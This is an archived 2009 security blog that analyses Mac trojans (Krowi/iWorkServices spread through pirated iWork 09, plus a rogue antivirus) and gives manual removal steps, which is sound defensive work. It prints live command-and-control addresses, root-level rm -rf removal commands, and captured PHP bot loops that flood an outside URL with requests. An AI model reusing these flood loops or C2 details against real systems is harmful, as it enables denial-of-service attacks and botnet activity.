Archive

Archive for January, 2009

New Offer from Rogue “iMunizator”

Looks familiar? Yes, we’ve seen this last year January from “MacSweeper” – the first Rogue in Mac.  The authors tries to defend their application and fixed it but the damage was already there.  Months later, a rebranded version “Imunizator” came out. This week we’ve seen its update and its too rogue “LifeTime” offers.
imuni

new_offer1

Latest OS X threat Krowi installs “DivX”

krowib_iconLatest update of threat Krowi was found in Adobe Photoshop cracker installer. 

Not much difference with “iWorkServices” except with the repackaging and name. However, this should serve as a reminder to be extra careful in downloading stuff!   

 

krowibstrings

Once installed, you’ll find these files and port activity below.

divx

How to Remove? It’s the same as the previous instruction except that you have to change the name from “iWorkServices” to “DivX”.

How To Remove “iWorkServices”

I noticed that few traffics coming in are looking on how to remove “iWorkServices”.

So, here’s a manual or  “Do It Yourself” steps: 

Open Terminal – >  /Application/Utilities/Terminal.app 

Check if “iWorkServices” is running, to do you can choose any of the options below: 

**Note: These commands requires root privileges to execute, to avoid re-entering your password everytime type – > “sudo su“.

 

  1. Check for “iworkservices” running process by typing “lsof -c iwork” or “lsof -c iWork“, just check which one works for you. 

 

sudo_02

Monitoring ” iWorkServices” background activity, you will notice TCP connections changes as it tries to communicate to 69.92.177.146:59201 and  qwfojzlk.freehostia.com:1024.

sudo_03

              1.1 If you know the PID or process ID then typing “lsof -p <PID>” will also give the same result.  

        2. Since we already confirmed the presence of this threat in the system, you could start removing them through executing the following commands:  

            rm -rf /System/Library/StartupItems/iWorkServices 

            rm /usr/bin/iWorkServices

            rm /private/tmp/.iWorkServices

            rm -rf /Library/Receipts/iWorkServices.pkg

            killall -9 iWorkServices

              2.1 Or you can copy the same instruction and make a small bash script, as exampled below:

#!/bin/bash
#This is a simple script to delete iworkservices files terminate running process
rm -rf /System/Library/StartupItems/iWorkServices
rm /usr/bin/iWorkServices
rm /private/tmp/.iWorkServices
rm -rf /Library/Receipts/iWorkServices.pkg
killall -9 iWorkServices
exit

You can write these instructions to any text editor like TextEdit (/Applications/TextEdit.app). 

textedit1

 

 

 

 

 

 

 

 

Open terminal and type “chmod +rwx <filename>” as exampled below. **Notice that I am root user here, so don’t forget to type “sudo su“, so your script will execute properly.**

chmod

And, execute it by typing “./<your_filename>.sh“.  In this example, I am executing “./remove.sh“, please refer the sequence below.                                                                                                                                                                                                           
                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                           
Ok,  for those who want to just “Click and Remove”, SecureMac provides a free clean-up tool and you can download directly from this link: 
http://macscan.securemac.com/files/iWorkServicesTrojanRemovalTool.dmg                                                                                                                                                                                                             
I have tested it and it’s a good tool to do the job for you! (“,                                                                                                                                                                                                                                                
If this instruction works, then i’ll be excited to hear your story.  I am pleased and overwhelmed on how much feedbacks I received from my previous blog article “How to Remove MacAccess” .  I hope this will be useful as well… 

Please feel free to drop a message and hopefully with additional information such as:

  • How did you get infected ? (website? )
  • Do you still have a copy of the application you installed ?  If yes, please send it to this email address:  meths101 (at) optusnet (dot) com (dot) au ; or just send me a link where I can download it.
  • Any unusual behavior found in your computer.

Happy Holidays!!! –> As of writing, it is a nice sunny “Australian day” today and I still feel sleepy for watching Australian Open last night. It was fun and amazing crowd!  

Top & Active

dashboard_2401091

Indeed this data speaks a thousand words!

Update: “iWorkServices” Not Just A Trojan

Let’s call the bad iWork as Krowi.

So, the story starts when OS X user will download an iWork 09 installation package with serial key through BitTorrent.

files

Take note that  Krowi is often found on a package “iWork09.zip” with filesize 450.4MB. Upon extracting, you’ll find  NO “iWorkServices” here instead a main installation package named iWork09Trial.mpkg and an enticing serial.txt.

Upon inspecting the content of “iWork09Trial.mpkg” you’ll find nasty Krowi “iWorkServices.pkg” piggybacking.

iworkpackage

The file “preflight” contains a one line instruction, which is executing the mach-o binary file “iworkservices”.

When installed, this will create the following files:

/System/Library/StartupItems/iWorkServices/StartupParameters.plist

/System/Library/StartupItems/iWorkServices/iWorkServices

/usr/bin/iWorkServices

Since the system keep a copy of the installer, you’ll find this as well:

/Library/Receipts/iWorkServices.pkg

Once installed, you will find “iWorkServices” process is running in background and it will persistently attempts to report to its command and control channels.

69.92.177.146:59201

qwfojzlk.freehostia.com:1024

example

Krowi is a nasty P2P controlled bot that is similar to known Storm Worm.

Infected OS X users machine can be controlled remotely by the bot master.  It can be used to participate in a massive Distributed Denial of Service attack(DDoS) , install further application (like software from Pay-per-Install ), spam and distribute malware and may gather user data.

Looking further, this malware comes with a Lua interpreter which is described as “powerful, fast, light-weight, embeddable scripting language”. This could expand further the capability of the attacker to the affected machine.  An automated master could respond and push PHP script …

Imagine,  load and run!

++++++++++++++++

Update 24th Jan: I just want to link few infection report I found around the net that was able to capture PHP scripts running on their box: 

http://notahat.com/posts/28 

http://macmagazine.com.br/forum/index.php?showtopic=12056&pid=58190&st=0&#entry58190 

 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, "http://www.dollarcardmarketing.com"); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);)  

root 35113 32.4 0.2 88956 4952? R-r 10:02 1:54.60 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com&#8221;); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);) 

root 35112 31.8 0.2 88956 4936? R-r 10:02 1:54.67 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com&#8221;); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);) 

root 35064 31.2 0.2 88956 5048? R-r 10:00 4:00.37 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com&#8221;); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);) 

root 35111 31.2 0.2 88956 4944? R-r 10:02 1:55.37 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com&#8221;); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);) 

root 35100 31.1 0.2 88956 4952? R-r 10:02 2:00.98 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com&#8221;); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);)

Latest OS X Threat: “iWorkServices”

A new OS X threat disguised as a legitimate application iWork 09 currently in-the-wild. Few OS X users had been tricked by this, so be careful! 

This malicious piece of code could create startup entry and copy itself as /usr/bin/iWorkServices. 

picture-1

 

picture-2

 

 Once installed, it will attempt to remotely communicate and execute HTTP request. It will also create /tmp/.iWorkServices and sets CHMOD 755 which is a read and execute for everyone, which may relate to its P2P activity. 

It is  also referencing to “Users/jason/diarrhea/aes/aes_modes.c”. 

 

 

Notice that this will also attempt to connect in this URL: 

picture-3

Ok, so the culprit is in Mach-O universal binary format: 

picture-4

I know this details are not enough, for now I can say that this is indeed a threat; a backdoor, trojan and P2P controlled bot. **Updated

**Note the file size that contains this threat is ~ 450MB**

Btw, this is currently discussed here: 

http://thepiratebay.org/torrent/4630952/iWork.09

http://thepiratebay.org/torrent/4627720/iWork__09_Trial